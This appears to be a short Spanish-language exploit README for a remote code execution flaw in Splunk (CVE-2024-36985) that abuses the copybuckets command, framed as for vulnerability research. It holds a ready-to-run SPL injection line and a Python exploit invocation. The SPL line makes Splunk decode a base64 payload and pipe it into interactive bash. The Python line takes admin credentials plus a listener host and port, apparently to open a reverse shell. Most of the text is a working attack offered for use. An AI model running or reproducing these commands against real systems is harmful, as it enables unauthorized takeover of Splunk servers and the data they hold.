
Exploit de RCE en Splunk mediante el uso de Copybuckets. Solo para investigación de vulnerabilidades.
Todos los códigos de exploit son generados por gemini.
Se requiere rol de administrador de Splunk. Aplicación Splunk_archiver habilitada.
También puedes ejecutar el siguiente SPL en la búsqueda para desencadenar el RCE.
| copybuckets data="{\"providers\": {\"pwn_provider\": {\"command.arg.0\": \"/opt/splunk/etc/apps/splunk_archiver/java-bin/jars/sudobash\", \"command.arg.1\": \"-c\", \"command.arg.2\": \"{echo,YOUR_BASE64_PAYLOAD_HERE}|{base64,-d}|{bash,-i}\"}}, \"vixes\": {\"pwn_vix\": {\"provider\": \"pwn_provider\"}}}"
python3 CVE-2024-36985.py -t TARGET_IP -u SPLUNK_ADMIN -p SPLUNK_PASS --lhost YOUR_KALI_UP --lport YOUR_LISTEN_PORT